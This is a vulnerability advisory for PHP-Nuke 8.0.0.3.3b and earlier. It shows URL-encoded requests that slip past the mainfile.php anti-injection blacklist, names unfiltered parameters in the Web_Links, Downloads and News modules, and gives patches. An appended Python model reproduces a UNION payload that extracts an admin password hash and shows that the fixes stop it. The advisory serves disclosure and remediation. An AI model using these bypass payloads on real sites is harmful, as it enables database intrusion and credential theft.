PHP Nuke <= 8.0.0.3.3b SQL Injections and Bypass SQL Injection Protection vulnerabilities
________________________
PROGRAM: PHP-Nuke
HOMEPAGE: http://phpnuke.org/
VERSION: all versions up to and including 8.0.0.3.3b
BUG: PHP Nuke <= 8.0.0.3.3b Bypass SQL Injection Protection and SQL Injections vulnerabilities
AUTHOR: Aleksandar
________________________
Let's look at the source code of mainfile.php, starting at line 435:
__________________________________________
//Union Tap
//Copyright Zhen-Xjell 2004 http://nukecops.com
//Beta 3 Code to prevent UNION SQL Injections
unset($matches);
unset($loc);
if(isset($_SERVER['QUERY_STRING'])) {
if (preg_match("/([OdWo5NIbpuU4V2iJT0n]{5}) /", rawurldecode($loc=$_SERVER['QUERY_STRING']), $matches)) {
die('Illegal Operation 1');
}
}
if(!isset($admin) OR (isset($admin) AND !is_admin($admin))) {
$queryString = $_SERVER['QUERY_STRING'];
if (($_SERVER['PHP_SELF'] != "/index.php") OR !isset($url))
{
if (stristr($queryString,'http://')) die('Illegal Operation 2');
}
if ((stristr($queryString,'%20union%20')) OR (stristr($queryString,'/*')) OR (stristr($queryString,'*/union/*')) OR (stristr($queryString,'c2nyaxb0')) OR (stristr($queryString,'+union+')) OR ((stristr($queryString,'cmd=')) AND (!stristr($queryString,'&cmd'))) OR ((stristr($queryString,'exec')) AND (!stristr($queryString,'execu'))) OR (stristr($queryString,'concat'))) {
die('Illegal Operation 3');
}
}
__________________________________________
So we can see the different filters. :)
Let's start with some testing:
TEST 1
http://localhost/nuke/?/*
We get the message: Illegal Operation 3. The raw query string contains "/*", which the stristr() check in the third block catches.
TEST 2
http://localhost/nuke/?%2f*
Yeah - we got through :)
The second and third blocks test the raw, still URL-encoded $_SERVER['QUERY_STRING'], so "%2f*" never matches "/*", while PHP decodes it to "/*" before the value reaches the module.
TEST 3
http://localhost/?%20UNION%20SELECT
Illegal Operation 1
Only the first block decodes the query string, and its regex matches five characters from its character class followed by a space; "UNION " (and "union ") satisfy it.
TEST 4
http://localhost:8080/html80/?%2f**/UNION%2f**/SELECT ..
Yeah - we got through :)
Decoded, this is "/**/UNION/**/SELECT": there is no space after UNION, so the regex of the first block does not fire, and the raw string contains "*/" but never "/*". MySQL treats "/**/" as whitespace, so the statement still parses as UNION SELECT.
PATCH:
The checks in the third block run on the raw, still URL-encoded query string, so the decoded form has to be tested as well; otherwise "%2f*" slips past the "/*" test:
__________________________________________
$decodedQuery = rawurldecode($queryString); // FIX: test the decoded form too
if ((stristr($queryString,'%20union%20')) OR (stristr($queryString,'/*')) OR (stristr($decodedQuery,'/*')) OR (stristr($queryString,'*/union/*')) OR (stristr($queryString,'c2nyaxb0')) OR (stristr($queryString,'+union+')) OR ((stristr($queryString,'cmd=')) AND (!stristr($queryString,'&cmd'))) OR ((stristr($queryString,'exec')) AND (!stristr($queryString,'execu'))) OR (stristr($queryString,'concat'))) {
die('Illegal Operation');
}
__________________________________________
This only closes the encoding gap shown in the tests above. A blacklist on the query string is no substitute for casting the parameters to the expected type (intval()) in the modules themselves, which is the fix described below.
Multiple SQL Injection vulnerabilities in the Web_Links, News and Downloads modules
+++++++++++++++++++++++++++
php.ini settings assumed:
magic_quotes_gpc = Off
register_globals = On
+++++++++++++++++++++++++++
Now let's look at the source code of Web_Links/index.php.
Vulnerable function:
function viewlinkcomments($lid) {
global $prefix, $db, $admin, $bgcolor2, $module_name, $admin_file;
include("header.php");
include("modules/$module_name/l_config.php");
menu(1);
$row = $db->sql_fetchrow($db->sql_query("SELECT title FROM ".$prefix."_links_links WHERE lid='$lid'")); // BUG: $lid is interpolated unfiltered here
$ttitle = filter($row['title'], "nohtml");
$lid = intval(trim($lid)); // too late: the query above has already been executed
echo "<br>";
...
How to fix:
Move $lid = intval(trim($lid)); above the query, so the value is cast to an integer before it is interpolated:
___________________________________________
function viewlinkcomments($lid) {
global $prefix, $db, $admin, $bgcolor2, $module_name, $admin_file;
include("header.php");
include("modules/$module_name/l_config.php");
menu(1);
$lid = intval(trim($lid)); // FIX
$row = $db->sql_fetchrow($db->sql_query("SELECT title FROM ".$prefix."_links_links WHERE lid='$lid'"));
$ttitle = filter($row['title'], "nohtml");
//$lid = intval(trim($lid)); // REMOVE THIS LINE: it is redundant now that the cast happens before the query
echo "<br>";
...
__________________________________________________
Vulnerable functions:
function viewlinkcomments($lid) {
function viewlinkeditorial($lid){
function ratelink($lid, $user) {
The "$lid" variable isn't filtered in any of them, so once the query-string protection in mainfile.php is bypassed as shown above, arbitrary SQL can be executed.
SQL Injection vulnerability in Downloads
Vulnerable functions:
function viewdownloadeditorial($lid) {
function viewdownloadcomments($lid) {
function ratedownload($lid, $user) {
The "$lid" variable isn't filtered in any of them, so once the query-string protection is bypassed, arbitrary SQL can be executed.
SQL Injection vulnerability in News
Vulnerable function:
function rate_complete($sid, $rated=0, $score) {
The "$sid" variable isn't filtered, so once the query-string protection is bypassed, arbitrary SQL can be executed.
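The four tests against the mainfile.php filter and the unfiltered $lid in the module functions can be reproduced offline with the following Python model. This is an added example, not PHP-Nuke code and not the advisory author's code: it re-implements the Union Tap checks as quoted above (with an optional decoded-string check for "/*" as one way to close TEST 2 and TEST 4), then runs the viewlinkcomments() query with and without the intval() fix against an in-memory SQLite database (SQLite, like MySQL, treats /**/ as a comment). The table names nuke_links_links and nuke_authors, their columns and rows, and the PAYLOAD string are constructed test data, not taken from the advisory.

```python
"""Model of the PHP-Nuke "Union Tap" blacklist and of the unfiltered $lid
query, to reproduce the advisory's four tests and the module injection
offline.  Added example: not PHP-Nuke code, not the advisory author's code.
Assumptions: the tables and rows below are constructed test data standing in
for nuke_links_links / nuke_authors, and SQLite replaces MySQL (both treat
/**/ as a comment, i.e. as whitespace).
"""
import re
import sqlite3
from typing import List, Optional, Union
from urllib.parse import parse_qs, unquote  # unquote == PHP rawurldecode(): '+' stays '+'


def stristr(haystack: str, needle: str) -> bool:
    """PHP stristr() used as a boolean: case-insensitive substring test."""
    return needle.lower() in haystack.lower()


def int_val(value: str) -> int:
    """PHP intval() on a string: the leading integer, or 0 if there is none."""
    m = re.match(r"\s*[+-]?\d+", value)
    return int(m.group()) if m else 0


def union_tap(query_string: str, patched: bool = False) -> Optional[str]:
    """The three mainfile.php checks for a non-admin request.

    Returns the die() message the filter would print, or None if the request
    passes.  The 'http://' check (Illegal Operation 2) is applied
    unconditionally, i.e. the branch taken when $url is not set.
    patched=True additionally tests the rawurldecode()d string for '/*'.
    """
    decoded = unquote(query_string)
    # Check 1 is the only one that decodes: five characters from the class
    # followed by a space.  "UNION " and "union " both match, "UNION/" does not.
    if re.search(r"[OdWo5NIbpuU4V2iJT0n]{5} ", decoded):
        return "Illegal Operation 1"
    if stristr(query_string, "http://"):
        return "Illegal Operation 2"
    # Check 3 runs on the RAW $_SERVER['QUERY_STRING'], so "%2f*" never equals "/*".
    if (stristr(query_string, "%20union%20")
            or stristr(query_string, "/*")
            or (patched and stristr(decoded, "/*"))
            or stristr(query_string, "*/union/*")
            or stristr(query_string, "c2nyaxb0")
            or stristr(query_string, "+union+")
            or (stristr(query_string, "cmd=") and not stristr(query_string, "&cmd"))
            or (stristr(query_string, "exec") and not stristr(query_string, "execu"))
            or stristr(query_string, "concat")):
        return "Illegal Operation 3"
    return None


def demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the two tables the injection touches."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE nuke_links_links (lid INTEGER, title TEXT);
        CREATE TABLE nuke_authors (aid TEXT, pwd TEXT);
        INSERT INTO nuke_links_links VALUES (1, 'Example link');
        INSERT INTO nuke_authors VALUES ('God', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def view_link_comments(conn: sqlite3.Connection, lid: str, hardened: bool) -> List[str]:
    """The query from viewlinkcomments(): $lid interpolated as-is
    (magic_quotes_gpc = Off), or cast with intval() first as in the fix."""
    if hardened:
        lid = str(int_val(lid.strip()))
    sql = f"SELECT title FROM nuke_links_links WHERE lid='{lid}'"
    return [row[0] for row in conn.execute(sql)]


def handle_request(conn: sqlite3.Connection, query_string: str,
                   hardened: bool = False, patched: bool = False) -> Union[str, List[str]]:
    """mainfile.php filter first, then the module query, as in the real flow.
    register_globals = On is what turns the lid= parameter into $lid."""
    blocked = union_tap(query_string, patched)
    if blocked:
        return blocked
    lid = parse_qs(query_string, keep_blank_values=True).get("lid", [""])[0]
    return view_link_comments(conn, lid, hardened)


# The advisory's four tests, and a constructed payload in the TEST 4 style that
# pulls nuke_authors.pwd through the title column: no spaces, no raw "/*".
ADVISORY_TESTS = ["/*", "%2f*", "%20UNION%20SELECT", "%2f**/UNION%2f**/SELECT"]
PAYLOAD = ("0%27%2f**/UNION%2f**/SELECT%2f**/pwd%2f**/FROM%2f**/nuke_authors"
           "%2f**/WHERE%2f**/%271%27=%271")

if __name__ == "__main__":
    for qs in ADVISORY_TESTS:
        print(f"{qs:28} -> {union_tap(qs) or 'passes'}")
    conn = demo_db()
    print("vulnerable:     ", handle_request(conn, "lid=" + PAYLOAD))
    print("intval fix:     ", handle_request(conn, "lid=" + PAYLOAD, hardened=True))
    print("patched filter: ", handle_request(conn, "lid=" + PAYLOAD, patched=True))
```

Running it shows the same split as the four tests: the two encoded requests pass the filter, the vulnerable query then returns the pwd row instead of a link title, the intval() version reduces the payload to lid='0' and returns nothing, and the decoded-string check blocks the request before any query runs.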
Best Regards
Aleksandar
Programmer and Web Developer